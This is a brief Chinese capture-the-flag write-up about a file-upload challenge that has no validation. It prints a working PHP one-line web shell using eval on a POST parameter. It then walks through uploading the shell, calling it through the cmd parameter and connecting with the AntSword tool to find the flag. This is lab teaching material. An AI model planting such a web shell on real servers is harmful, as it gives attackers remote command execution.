解题思路
题目字面意思--无验证,即对所上传文件无任何验证
解题思路:上传木马文件--获取靶机shell--访问服务器
"shell" - 取得对服务器某种程度上操作权限
上传shell.php 一句话木马文件 <?php @eval($_POST['cmd']); ?>
eval是执行命令的函数 $_POST['cmd']是接收的数据
上传成功后拿到文件的相对路径进行访问
查看木马是否上传成功 可给cmd传递数据进行查看
木马中接收方法为POST 所有只能使用POST去提交数据给cmd
打开蚁剑连接木马
测试连接成功,添加数据查看
在网站根目录找到flag